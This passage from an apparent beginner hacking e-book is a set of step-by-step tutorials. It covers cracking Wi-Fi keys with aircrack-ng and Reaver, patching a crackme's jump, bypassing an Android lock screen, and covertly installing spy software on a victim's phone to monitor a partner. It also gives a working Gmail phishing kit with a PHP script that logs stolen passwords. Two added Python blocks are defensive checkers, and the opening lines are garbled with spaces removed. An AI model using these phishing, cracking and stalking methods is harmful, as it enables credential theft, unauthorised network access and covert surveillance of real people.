ThiscommandwillchangeyourMACaddressto00:11:22:33:44:55.3)Nowthenextworkistotypeairmon-ngstartwlan0andpressenter.
Thiswillstartthewirelessadapterinmonitormode.Notedownthenewinterfacename,itcouldbeeth0ormon0orsomethinglikethat.
Theabovecommandintheconsolehasstartedyournetworkadapterinmonitormodeasmon0:
4) Now that our wireless adapter is in monitor mode, we have the capability to see all the wireless traffic that passes by in the air. We can grab that traffic by simply using the airodump-ng command.
This command grabs all the traffic that your wireless adapter can see and displays critical information about it, including the BSSID (the MAC address of the AP), power, number of beacon frames, number of data frames, channel, speed, encryption (if any), and finally, the ESSID (what most of us refer to as the SSID). Let's do this by typing:
airodump-ng mon0
In the above screenshot there is a list of available networks. Choose 1 network and note its BSSID and channel.
5.) Type airodump-ng -c channelno --bssid BSSIDN1 mon0 -w filename and hit Enter.
Replace channelno and BSSIDN1 with the data from step 4. Replace mon0 with the network interface name from step 3. In place of filename write any name and do remember it. Better to use filename itself.
This command will begin capturing the packets from the network. You need to capture more and more packets in order to crack the Wi-Fi password. This packet capturing is a slow process.
6.) To make the packet capturing faster, we will use another command. Open a new shell; don't close the previous shell. In the new shell type aireplay-ng -1 0 -a BSSIDN1 -h 00:11:22:33:44:55 mon0 and hit Enter.
Replace BSSIDN1 with the data from step 4 and mon0 with the name from step 3. This command will boost the data capturing process. The -1 tells the program the specific attack we wish to use, which in this case is fake authentication with the access point. The 0 cites the delay between attacks, -a is the MAC address of the target access point, -h is your wireless adapter's MAC address and the command ends with your wireless adapter's device name.
7.) Now wait for a few minutes; let the DATA in the other console reach a count of 5000.
8.) After it reaches 5000, open another console and type aircrack-ng filename-01.cap and hit Enter. Replace filename with the name you used in step 5. Add -01.cap to it. .cap is the extension of the file having the captured data packets. After typing this command, aircrack will start trying to crack the Wi-Fi password. If the encryption used is WEP, it will surely crack the password within a few minutes.
In case of WPA use the following command instead of the above:
aircrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst -b BSSIDN1 filename-01.cap
Replace BSSIDN1 and filename with the data you used. /pentest/wireless/aircrack-ng/test/password.lst is the address of a file having a wordlist of popular passwords. In case of WPA, aircrack will try to brute-force the password. As I explained above, to crack WPA you need a file having passwords to crack the encryption. If you are lucky enough and the network owner is not smart enough, you will get the password.
PREVENTION:
For prevention from being hacked you can refer to the chapter "PASSWORD CREATING POLICIES".
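The chapter's point that a WPA key falls to a wordlist unless the passphrase is strong can be checked before a passphrase is ever set on the access point. The following is an added example, not code from the book; the sample wordlist, the 60-bit floor and all function names are assumptions made for the illustration.

```python
import math
import re
import string

# Constructed stand-in for a common-password list such as the password.lst
# file the chapter mentions; a real audit would load a far larger list.
SAMPLE_WORDLIST = {"password", "12345678", "qwertyuiop", "letmein", "iloveyou"}

MIN_BITS = 60  # assumed policy floor for this example, not a figure from the book

# Undo common character substitutions before the wordlist lookup.
LEET = str.maketrans("013457@$!", "oieastasi")
CLASSES = [string.ascii_lowercase, string.ascii_uppercase,
           string.digits, string.punctuation + " "]


def variants(passphrase):
    """Forms of the passphrase that a wordlist with simple mangling rules covers."""
    low = passphrase.lower()
    stem = re.sub(r"[\d\W_]+$", "", low)  # cut a trailing run of digits/symbols
    forms = {low, stem, low.translate(LEET), stem.translate(LEET)}
    return {form for form in forms if form}


def keyspace_bits(passphrase):
    """Upper bound on blind brute-force cost: length * log2(character pool used)."""
    pool = sum(len(cls) for cls in CLASSES if any(ch in cls for ch in passphrase))
    return len(passphrase) * math.log2(pool) if pool else 0.0


def audit_passphrase(passphrase, ssid, wordlist=SAMPLE_WORDLIST):
    """Return a list of findings; an empty list means every check passed."""
    findings = []
    if not 8 <= len(passphrase) <= 63:
        findings.append("invalid-length")       # WPA/WPA2-PSK accepts 8-63 characters
    if any(not 32 <= ord(ch) <= 126 for ch in passphrase):
        findings.append("non-printable-ascii")  # passphrases are printable ASCII
    if variants(passphrase) & set(wordlist):
        findings.append("wordlist-match")       # guessable whatever its keyspace
    if ssid and ssid.lower() in passphrase.lower():
        findings.append("contains-ssid")        # derived from the broadcast name
    if keyspace_bits(passphrase) < MIN_BITS:
        findings.append("small-keyspace")
    return findings


if __name__ == "__main__":
    for candidate in ("p@ssw0rd2015", "12345678", "HomeNet-wifi",
                      "correct horse battery staple 47"):
        print(candidate, "->", audit_passphrase(candidate, "HomeNet") or "ok")
```

Note that "p@ssw0rd2015" passes the keyspace estimate and is still rejected, because a wordlist with simple substitutions covers it.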
NEWBIE'S WAY TOWARDS REVERSE ENGINEERING
Nowadays people expect something more from an application than what is provided by the developers. People want to use that specific application according to their own preferences. So now we are here with an article on the topic of reverse engineering. Let's start with simple engineering: "simple engineering" is the task of developing/building something, BUT reverse engineering refers to the task of redeveloping/re-building something. In simple words, reverse engineering is the task of modifying the source code of the application to make it work our way. Reverse engineering is a very complicated topic and is very difficult for beginners to understand, as it requires prior knowledge of assembly language.
Developing is easy but re-developing is not easy!! Because during development a programmer has to deal with functions, pointers, conditions, loops etc… But during the decompilation process we need to deal with registers!
Generally 32-bit/64-bit Windows supports mainly 9 registers:
Performing registers:
> EAX: Extended Accumulator Register
> EBX: Base Register
> ECX: Counter Register
> EDX: Data Register
Index:
> ESI: Source Index
> EDI: Destination Index
Pointer:
> EBP: Base Pointer
> ESP: Stack Pointer
> EIP: Instruction Pointer
So, let's move towards "How to modify the applications". The general requirements you need for the modification are listed below and easily available on the internet:
1. OllyDBG
2. CrackMe App (click here to download) (register and activate your account before download)
PROCESS:
When you have downloaded both the apps, first of all you need to launch the CrackMe App. It will ask you to enter the password; enter any password you want and hit "OK".
Now it will show you the error "You are not authorized to use the application".
Now open OllyDBG and open the CrackMe app in it. When you have opened the CrackMe app in OllyDBG, in the upper left box, while scrolling up, you will find a statement like this:
JE SHORT Password.00457728
Basically, this is a conditional jump, which means that if the condition is true it will jump to 00457728, which shows us the message "You are not authorized to use the application", and if the condition is not true it just continues reading the code. So we don't need this jump to work, as we don't want to get the error message.
Now, for removing the error message, we can change JE SHORT Password.00457728 to JNE SHORT Password.00457728. JNE (Jump If Not Equal) means that if the password is correct it will give you the error message and if the password is incorrect it will give you the correct message.
For changing the instruction, just double-click the line JE SHORT Password.00457728, simply change it to JNE SHORT Password.00457728 and hit "Assemble".
Now hit the blue "PLAY" button at the top of OllyDBG to start the CrackMe app again and enter the password; it will then give you the correct message.
PHISHING ATTACK AHEAD
EMAIL AND FACEBOOK HACKING BY PHISHING
What is phishing?
Phishing is an attempt by the sender to have the receiver of the email release their personal information, i.e. the attacker lures the victims into giving some confidential information.
Why phishing?
There are many password cracking tools that are coming into and going from the market. But phishing is the most efficient method to steal confidential information like passwords, credit card numbers, bank account numbers etc.
How phishing works?
It works just like normal fishing. A fisherman generally throws bait into the water to lure the fish. Then a fish comes to take the food, feeling that it is legitimate. When it bites the bait, it will be caught by the hook. Now the fisherman pulls out the fish.
In the same way, the hacker sends a fake login page to the victim. The victim thinks that it is a legitimate one and enters his confidential information. Now the data will be with the hacker.
Now, let's learn how to hack by phishing: I am selecting a Gmail account to be hacked by phishing.
For phishing you need the following stuff: First of all you have to open gmail.com in your browser and, when the page has opened completely, right-click on the page and a dialogue box will open with an option "view page source" in it. Click on the "view page source" option and you will see the source code of that page open. Then press Ctrl+F to open the text/word finding box. Type "action=" and replace it with anything.php, such as "action=mail.php". Then find "method=" and also replace it with "get", such as method="get".
Then save the file as anything.html, such as "Gmail.html". Then create a blank Notepad file "log.txt". Then again open Notepad and type the following code:
<?phpheader(“Location:http://www.Gmail.com”);$handle=fopen(“logs.txt”,“a”);foreach($_GETas$variable=>$value){fwrite($handle,$variable);fwrite($handle,“=”);fwrite($handle,$value);fwrite($handle,“\r\n”);}fwrite($handle,“\r\n”);fclose($handle);exit;?>
And save it as "mail.php" (save this file under the same name as you have replaced in "action="). Now finally you have the three files which are required for the phishing.
1) Gmail.html (fake login page)
2) mail.php (to capture the login details)
3) log.txt (to store the captured details)
Procedure:
step 1: Create an account on any free web hosting site like
www.bythost.com
www.000webhost.com
www.ripway.com
www.my3gb.com
step 2: Now upload all the three files you have downloaded. (I have taken www.my3gb.com)
step 3: Give the link of the fake page to your victim.
eg: www.yoursitename.my3gb.com/Gmail.html
step 4: When he clicks the link, it opens a fake Gmail page where he enters his login details. When he clicks the sign-in button, his login details will be stored in the log.txt file.
Demonstration: Here I have uploaded my scripts onto www.my3gb.com
And copy the Gmail.html link which you have to send the victim. I clicked the Gmail.html link. A fake page was opened where I entered my login details.
This page will look exactly similar to the original Gmail login page. And when the victim enters his/her login details for logging into his/her account, this time the victim will be redirected to the original Gmail login website. The victim won't even know that his/her account got hacked. The victim will think that the page got reloaded due to internet errors or login mistakes etc.
Now his/her login details were captured by the PHP script and stored in the log.txt file as shown in the figure below:
In the same way you can hack FACEBOOK accounts and other social networking accounts.
How to protect ourselves from phishing?
Don't use links
Be suspicious of any e-mail with urgent requests
By using secured websites
Using efficient browsers
Using antivirus or internet security software.
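The two changes the chapter makes to a copied login page (the form's action pointed at another script, and method set to get) are exactly what a defender can test for in a page before trusting it. The following is an added example, not code from the book; the hostnames, the sample pages and the function names are constructed for the illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

TRUSTED_HOSTS = {"accounts.example.com"}  # constructed: the real login origin

# Constructed sample of a copied page edited the way the chapter describes.
CLONED_PAGE = ('<form action="mail.php" method="get">'
               '<input type="text" name="Email">'
               '<input type="password" name="Passwd"></form>')
# Constructed sample of the genuine page.
GENUINE_PAGE = ('<form action="/signin" method="post">'
                '<input type="text" name="Email">'
                '<input type="password" name="Passwd"/></form>')


class LoginFormCollector(HTMLParser):
    """Collects every <form>, noting whether it holds a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self.current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.current = {"action": attrs.get("action") or "",
                            "method": (attrs.get("method") or "get").lower(),
                            "has_password": False}
        elif tag == "input" and self.current is not None:
            if (attrs.get("type") or "").lower() == "password":
                self.current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self.current is not None:
            self.forms.append(self.current)
            self.current = None


def audit_login_page(html, page_url, trusted_hosts=TRUSTED_HOSTS):
    """Return findings for a page that asks for a password; [] means none."""
    collector = LoginFormCollector()
    collector.feed(html)
    collector.close()
    if collector.current is not None:      # form never closed in the markup
        collector.forms.append(collector.current)
    findings = []
    page = urlparse(page_url)
    if page.scheme != "https":
        findings.append("page-not-https")
    if page.hostname not in trusted_hosts:
        findings.append("page-host-untrusted")
    for form in collector.forms:
        if not form["has_password"]:
            continue
        # A relative action such as "mail.php" resolves against the page URL.
        target = urlparse(urljoin(page_url, form["action"]))
        if form["method"] != "post":
            findings.append("password-sent-by-get")
        if target.scheme != "https":
            findings.append("form-target-not-https")
        if target.hostname not in trusted_hosts:
            findings.append("form-target-untrusted")
    return findings


if __name__ == "__main__":
    print(audit_login_page(CLONED_PAGE, "http://login-page.example/Gmail.html"))
    print(audit_login_page(GENUINE_PAGE, "https://accounts.example.com/login"))
```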
USB SECURITY
Securing Pen Drives From Malicious Viruses
Today, a big problem for Windows users is securing their data from viruses. This is especially true of pen drives: nobody wants to keep vital data on pen drives, because pen drives are portable devices and through sharing data they may get infected by viruses such as the shortcut virus, Autorun.inf, the new folder virus etc. Some people recover their data simply by using Command Prompt; however, some people assume the only possibility left is to format the pen drive.
So, if your pen drive is infected by any of those viruses, you can simply follow these steps to get your hidden data back.
Open CMD (Command Prompt).
Open the flash drive in CMD (if your drive is 'G' then enter 'G:' after c:\user\ and press [ENTER]).
Now type the following command and hit Enter:
attrib -s -h /s /d
Now open your pen drive in Windows and you may see all of your files. However, wait! Is it enough? No way! Your pen drive is still not totally secure. The above command simply shows all of your files that were hidden by viruses. If you want to shield your USB from obtaining unwanted files, i.e. virus, worm, spy, Trojan etc., then you need to follow these steps.
What I'm going to tell you is a way to set up your registry to stop a computer from saving files to your USB. If you have Windows 7 or Windows 8 then you can disable the option of writing to USB drives. This trick is very useful if you have a virus on your laptop and want to copy files from a USB drive but don't want to transfer the virus to the USB. Follow the given steps to disable the USB writing option:
Open Notepad and copy and paste the following:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies]
"WriteProtect"=dword:00000001

Now save the file with the extension ".reg".
Click on the file you just saved. In the pop-up window select Yes and then OK. That's it, your USB is now secure.
TURNING THE SECURITY OFF
To turn this security measure off, open Notepad and copy and paste the following:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies]
"WriteProtect"=dword:00000000

Now save the file with the extension ".reg". Click on the file you just saved. In the pop-up window click Yes and then OK. That's it, your protection is now disabled.
PDF SECURITY
HOW TO PROTECT YOUR PDF FILES FROM COPYING
These days it's a big deal to secure your PDF documents. In this article I will show you "HOW TO PROTECT YOUR PDF FILES FROM BEING COPIED FOR PIRACY AND OTHER MALICIOUS INTENTIONS".
For protecting your PDF files you can use the tool "A-PDF password security". You can set a password and prevent people from copying and pasting the PDF contents. Here is an easy tutorial to make you aware of the use of that tool.
Install "A-PDF password security". Launch the program and open the password protect wizard.
Select the option "single pdf document security" and push the button "next >". Click the "browse" button to open the PDF file that will be encrypted, and select the security level and encryption method. You can set up a password for opening and for modification of your document.
Click "save" or "save as" to set a document open password and disallow the copying permission.
After saving the file you can choose to open the saved PDF file with the default PDF viewer, set another PDF file's security, or open the destination folder in Windows Explorer.
Open the saved PDF file with the default PDF viewer.
NOTIFY ME
SENDING A MESSAGE TO OTHER USER IN YOUR PC
In this article we are going to learn how to send a message to another user account associated with your own PC.
Let's assume you want to leave a message for your brother or sister, who have user accounts on the same PC on which you also have a user account.
So follow these steps to pass any message you want to another user account at his next login.
Open the task manager of your PC by pressing the CTRL+ALT+DEL keys simultaneously. Then click on the user option to view the available user accounts associated with your PC.
Select the other user account to which you want to pass the message. Then click on the "send message" option placed in the lower right corner.
A dialogue box will open. Type any message you want to convey to them. If you want to shock them then you can type "HELLO USER… YOUR COMPUTER IS INFECTED BY TROJAN".
And when the other user logs in to his/her user account, the same message will be displayed to him.
"I AM A FOLDER I DON'T HAVE A NAME"
HOW TO CREATE A FOLDER WITH EMPTY NAME
This is the most interesting article of this book, and here I will show you how to create a folder without naming it. Sometimes it will be very useful for you.
Let's assume you have simply hidden a folder. When you search for it by name from the address bar, it will be opened easily. So think: if there is a folder without a name, then how can it be possible to search for it from the address bar or search box? So follow these steps to create a folder without a name:
Open the location where you want to create the folder. Just right-click anywhere to create the folder.
When it asks you to rename the folder, press the ALT key and, while keeping the ALT key pressed, press "2, 5, 5" one by one. And then press Enter.
You will find that it creates a folder without any name.
SPYING WITH ANDROID
HACKING ANDROID PHONE
Hello friends, in this article we will learn how to spy on an Android phone. These days are the era of smartphones, especially those based on Android. In this article I will show you how to get the details of the victim by spying on the victim's Android phone. This is the best way to keep tracking your child and also your girlfriends.
For spying I am using a tool named THE TRUTH SPY.
By using this tool you can easily keep tracking the victim's Android phone.
I am showing you screenshots of the things which we can spy on from an Android phone, such as CALL HISTORY, WHATSAPP MESSAGES, and SMS DETAILS etc. The list is shown below in the screenshot.
Note: this tool is also available for iOS devices.
You have to follow these steps to start spying.
First of all you have to download the apk file of this tool, install it on the victim's Android phone and log in to it. This tool is only 800 KB, so you can easily manage it within seconds. A very interesting thing about this tool is that you can also hide it on the victim's Android phone, so that the victim will not be aware of it. You can download the apk file from the website (my.thetruthspy.com). After installing the app, go to the same website of the app on your computer, register using your email ID and log in to view the details of the victim's Android phone. For getting details, ensure that the data connection of the victim's phone is ON. When you want to unhide the app on the victim's phone, just make a call from the victim's phone to #2013*.
Note: sometimes this "thetruthspy" stops working, so you can also search for any other spy tool by simple Google searches. You will find a lot of tools like this that function in almost the same way.
MOBILE: "I CAN CONTROL YOUR PC"
FULL CONTROL YOUR PC BY PHONE
Now I have a very interesting thing for you… I know you got tired of the difficult hacking chapters above.
In this article I am going to tell you how to control your computer fully from your mobile phone. It's a very interesting thing for you if you got tired of using the trackpad and keyboard of your computer.
So let's see how to do it: In this article I am going to use a tool named UNIFIED REMOTE, which is used to remote-control our PC.
Unified Remote is an app that lets you control your entire Windows computer from your Android device. It turns your device into a Wi-Fi or Bluetooth remote control for all the programs on your computer. With this app you can control a wide range of applications, including simple mouse and keyboard, media players and other external gadgets that can be connected to your computer (such as USB-UIRT and tellstick). It even provides extensive capabilities for users to create their own custom remotes for their needs.
You have to follow these simple steps to remote-control your PC with Unified Remote:
Download and install the Unified Remote server on your computer (Windows). You can easily find it by your Google searches. When you have installed it, launch it.
Connect your Android phone to the same Wi-Fi network as your computer. Alternatively, if your computer is Bluetooth ready, pair it with your phone.
Download and install the apk file of Unified Remote from the Play Store. At launch, confirm that you have installed the server.
Then add a new server, select "automatic" and the app will find your computer. Tap your computer's name to connect. Now you are ready to start controlling your computer with your phone. Tap remote in the app.
The "Basic input" remote will prompt the mouse, which you can use as a trackpad. Instructions for using the mouse will appear on screen. There are also a lot of options available by which you can control your computer in different ways.
Example: keyboard controlling, file manager, media, power, start, YouTube etc.
LAUNCH GOD MODE
LAUNCHING WINDOWS GOD MODE
Here I have a nice Windows trick for you which saves you much time. In this article we will learn how to launch GOD MODE on your computer.
Windows god mode is a simple way to get centralized access to all the administrative options that are normally seen inside Control Panel, in a newly created folder which can be placed anywhere on the computer. Usually the administrative options are scattered inside Control Panel, arranged in different categories and subcategories. Windows god mode arranges all the administrative options inside one single window. You will find it much more neatly arranged and user friendly.
Let's see how to launch god mode in simple steps: You need to create a new folder for this launch. Right-click in the window where you want to create the new folder. When it asks you to rename that folder you have to enter the following code after any word.
Example:
Ujjwal.{ED7BA470-8E54-465E-825C-99712043E01C}
Or
Saurabh.{ED7BA470-8E54-465E-825C-99712043E01C}
Or
Anything.{ED7BA470-8E54-465E-825C-99712043E01C}
Don't forget to use curly brackets. After renaming the folder press Enter.
You will see that the icon of that folder changes, and when you open it you will find all the settings arranged in it in a well-ordered manner.
CRACKING LOCK SCREEN
HOW TO CRACK ANDROID LOCK SCREEN
In this article we are going to learn how to bypass the Android lock screen.
We are going to bypass the lock screen using a tool named Aroma File Manager.
This is the best method for cracking the Android pattern lock; you must have a custom recovery installed on your device in order to use this method. Let's start cracking the Android lock screen.
First of all download the Aroma File Manager zip file. Google it and you will find it easily.
Now copy this Aroma File Manager zip to the root of your SD card. After copying the zip file to the SD card, boot your phone into Recovery mode (each phone has a different key combination to boot up in recovery mode; you can search for it on Google).
In recovery choose "install zip from SD card or apply update from SD card", now select the Aroma.zip which you downloaded earlier.
After installing or updating, Aroma File Manager will open. Use the volume up and down keys for scrolling as you do in recovery. In Aroma File Manager go to the menu, which is located in the bottom strip; after clicking menu, select settings. Go to the bottom in settings and then select "mount all partitions in startup"; after mounting, exit Aroma File Manager. Now launch Aroma File Manager again. In Aroma go to Data >> System. You will find "Gesture.key" if you have applied a gesture lock or "Password.key" if you have applied a password.
Long-press "Gesture.key" or "Password.key", whichever one is available. After the long press it will prompt some options; choose delete, delete that file and restart your device (first exit from Aroma File Manager, then restart your phone).
Yuppie! Your phone is unlocked now. After rebooting it will ask you for a lock pattern; don't worry, now you can use any pattern, your old pattern has gone away.
REAVER BACKTRACK
WI-FI CRACKING USING REAVER IN BACKTRACK
Well, in this article I will show you how to crack a WPA2-PSK key using a tool named REAVER. Reaver cracks the key by the brute-force method.
Let's see how to crack the key using Backtrack. I am using Backtrack 5 r3. So open the console and follow the given steps:
The first thing to do is run the command:
airmon-ng start wlan0
Now the next command to write is:
airodump-ng wlan0
With this command we look for available networks and information regarding BSSID, PWR, Beacons, data, channel etc…
Now you need to run the following code:
reaver -i mon0 -b -c BSSID -c channel networkname
Note: Use the values of BSSID, channel and network name in the above command.
I have executed the command and it starts to work as shown in the picture below:
Now you have to wait; the time taken is dependent on the strength of the password and the speed of your internet connection.
And finally, after brute forcing, it will give you the WPA2 pin.
WINDOWS SHORTCUTS
SOME USEFUL WINDOWS SHORTCUTS
1. Windows Key + Tab: Aero
2. Windows Key + E: Launches Windows Explorer
3. Windows Key + R: Run Command box
4. Windows Key + F: Search
5. Windows Key + X: Mobility Center
6. Windows Key + L: Lock Computer
7. Windows Key + U: Ease of Access box
8. Windows Key + P: Projector
9. Windows Key + T: Cycle Super Taskbar Items
10. Windows Key + S: OneNote Screen Clipping Tool
11. Windows Key + M: Minimize All Windows
12. Windows Key + D: Show/Hide Desktop
13. Windows Key + Up: Maximize Current Window
14. Windows Key + Down: Restore Down/Minimize
15. Windows Key + Left: Tile Current Window to the Left
16. Windows Key + Right: Tile Current Window to the Right
17. Windows Key + # (any number)
18. Windows Key + =: Magnifier
19. Windows Key + Plus: Zooms in
20. Windows Key + Minus: Zooms out
21. Windows Key + Space: Peek at the desktop
DATA FORENSICS
HOW TO RECOVER PERMANENTLY DELETED FILES
In this article we will learn how to recover permanently deleted files from our computer. Sometimes your important data is accidentally deleted from your computer as well as from the recycle bin, and it's very important to recover that file or data.
So here I am using a tool named "Stellar Phoenix Windows Data Recovery" to recover the permanently deleted files.
By using this tool you can recover your accidentally deleted data from your computer.
For this you have to follow the simple steps mentioned below:
Click on the option "deleted file recovery" or "folder recovery" according to your choice. Then choose the local drive which you want to scan for the deleted files/folders. Then it asks you for a quick scan or deep scan; you can choose according to your need.
After that it scans for all the deleted files/folders on your selected local drive and shows you the list of all the folders from which files were deleted.
Then you have to select the deleted file/folder which you want to recover, as I have selected here "hacking tools" from the folder "vi". Then click on the recover option to recover your data successfully.
Note: The recovered data will work only when the location from which that file/folder was accidentally deleted is empty/not overwritten.
CONCLUSION:
Thanks for reading this book, and I hope the contents described in this book will help you to know the intents of hackers. Now you are capable of securing your own and your surrounding computers, mobile phones and other networks from the threat we called "HACKING An art of exploitation".